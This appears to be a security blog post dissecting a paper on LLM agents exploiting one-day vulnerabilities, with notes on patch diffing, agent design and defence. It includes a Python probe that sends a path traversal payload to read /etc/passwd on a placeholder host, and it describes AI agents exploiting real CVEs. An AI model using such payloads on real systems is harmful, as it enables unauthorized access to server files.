Research Paper Dissection - LLM agents exploit 1day vulns


This entire post is based on the research paper by:

Richard Fang, Rohan Bindu, Akul Gupta, Daniel Kang

The paper was referenced in a previous post, part of a series of experiments on detection and exploitation automation using GenAI. Part 2 is the latest:

Detection with GenAI (Part 2): CrushFTP (CVE-2024-4040)
The second in a series of GenAI experiments for prevention, detection and response. This exercise was the ITWeb Security Summit Hackathon #SS24Hack second-day challenge for the Snode Technologies Blue Team GenAI CTF (capture the flag) event.

The rise in LLM performance is driving deeper interest in LLM agents and their capabilities. The paper suggests that all prior research in this space focuses on "simple" vulnerabilities. I must admit, my own series of articles started with a path traversal exploit, so this is true. However, contrary to the paper's suggestion that most work is performed against "toy" targets, I focused on recent (2024) "real-world" CVEs.

What??? Are path traversals still possible in 2024? ../../../../../../../ 4.sheezy!

Thanks to Stealthcopter (https://sec.stealthcopter.com/intigriti-august-2024-ctf/)
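
For the curious, probing for a path traversal really is that simple. Below is a minimal, hypothetical sketch in Python: the target URL and the "file" parameter are made-up placeholders for illustration, and the check just looks for a tell-tale /etc/passwd marker in the response.

```python
import requests

# Hypothetical target and parameter name - placeholders for illustration only.
TARGET = "http://victim.example/download"
PAYLOAD = "../../../../../../etc/passwd"

def probe_path_traversal(target: str, payload: str) -> bool:
    """Send a single traversal payload and look for a tell-tale /etc/passwd marker."""
    response = requests.get(target, params={"file": payload}, timeout=10)
    return "root:x:0:0" in response.text

if __name__ == "__main__":
    vulnerable = probe_path_traversal(TARGET, PAYLOAD)
    print("[!] Traversal likely" if vulnerable else "[-] No traversal detected")
```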

In this post we will cover the following:

  1. Most notable - concepts;
  2. Most notable - findings; &
  3. All important - so what?

Key Concepts

n-day (0-day, 1-day) exploits

You may have come across the term "zero day", "0day" or "0-day" in the past. Simply put, this is a vulnerability with no vendor fix (patch), since the vendor:

  1. Doesn't know about it yet;
  2. Doesn't care about it; or
  3. Is still finding a fix for it.

Traditionally (in the olden days) it referred to the number of days the vendor had to fix an issue before the vulnerability (PoC exploit) was disclosed. The paper describes one-day vulnerabilities as: "vulnerabilities that have been disclosed but not patched in a system". Personally, I find "patch-diffing" analysis and exploitation most interesting:

Understanding the ConnectWise ScreenConnect CVE-2024-1709 & CVE-2024-1708 | Huntress
This blog discusses the Huntress Team’s analysis efforts of the two vulnerabilities and software weaknesses in ConnectWise ScreenConnect (CVE-2024-1708 and CVE-2024-1709) and the technical details behind this attack.

Granted, this is not a binary diff, but it's still pretty cool!
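
If you want to try the idea yourself, source-level patch diffing needs nothing more than the Python standard library. The sketch below is a minimal illustration, not the Huntress methodology: the file paths are placeholders for pre-patch and post-patch copies of the same source file, and the changed hunks in the output are usually where the fixed flaw lives.

```python
import difflib
from pathlib import Path

# Placeholder paths - point these at pre- and post-patch copies of the same source file.
OLD_FILE = Path("pre_patch/Handler.cs")
NEW_FILE = Path("post_patch/Handler.cs")

def patch_diff(old: Path, new: Path) -> str:
    """Return a unified diff of two source files; the changed hunks show what the vendor fixed."""
    old_lines = old.read_text(errors="ignore").splitlines(keepends=True)
    new_lines = new.read_text(errors="ignore").splitlines(keepends=True)
    return "".join(difflib.unified_diff(old_lines, new_lines,
                                        fromfile=str(old), tofile=str(new)))

if __name__ == "__main__":
    print(patch_diff(OLD_FILE, NEW_FILE))
```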

LLM agent

An LLM agent is an application that uses an LLM to reason, plan and act its way from a problem to a solution. Agents typically have access to additional planning, memory and tooling. Augmenting bespoke agents, for example with a RAG (retrieval-augmented generation) pipeline, can produce powerful, autonomous, highly focused LLM-based solutions. The paper describes such an agent:

Figure 1. LLM Agent (shown in: https://arxiv.org/pdf/2404.08144)
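
To make that architecture concrete, here is a minimal, hypothetical agent loop in Python. It is not the paper's implementation: llm_complete() is a stub standing in for whichever model provider you use, the single "tool" is a harmless shell command executor, and the prompt format is invented, but it shows the plan-act-observe cycle that planning, memory and tooling plug into.

```python
import subprocess
from dataclasses import dataclass, field

@dataclass
class AgentMemory:
    """Running transcript the agent carries between steps (the 'memory' component)."""
    history: list[str] = field(default_factory=list)

    def add(self, entry: str) -> None:
        self.history.append(entry)

def llm_complete(prompt: str) -> str:
    """Stub for a real LLM call; returns a canned 'action' purely for illustration."""
    return "RUN: uname -a"

def run_tool(command: str) -> str:
    """The agent's single 'tool': run a (harmless) shell command and capture its output."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=30)
    return result.stdout + result.stderr

def agent_loop(task: str, max_steps: int = 3) -> AgentMemory:
    memory = AgentMemory()
    for _ in range(max_steps):
        prompt = f"Task: {task}\nHistory: {memory.history}\nNext action?"
        action = llm_complete(prompt)           # plan: ask the model what to do next
        if not action.startswith("RUN: "):
            break                               # model signalled it is done
        observation = run_tool(action[5:])      # act: execute the chosen tool call
        memory.add(f"{action} -> {observation.strip()}")  # observe and remember
    return memory

if __name__ == "__main__":
    print(agent_loop("enumerate the local environment").history)
```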

Key findings

The results

In summary, it's possible (and I agree with this finding). Some cases may be more difficult than others, and some models may not be able to solve the problem. However, it is possible with the right model (e.g. GPT-4) targeting specific types of vulnerabilities.

In my next article, I'll describe a process for end-to-end discovery to exploitation.


So what?

Firstly, this implies that patch latency, already a problem for most organisations, will become an exponentially bigger issue. As we shift focus to prioritise and reduce the attack surface, using robust methodologies like CTEM (continuous threat exposure management), we must gravitate towards a similar agentic approach for defence. An apt cliché: you need to fight fire with fire.

If you would like more information on AI Defence Tech contact Snode Technologies.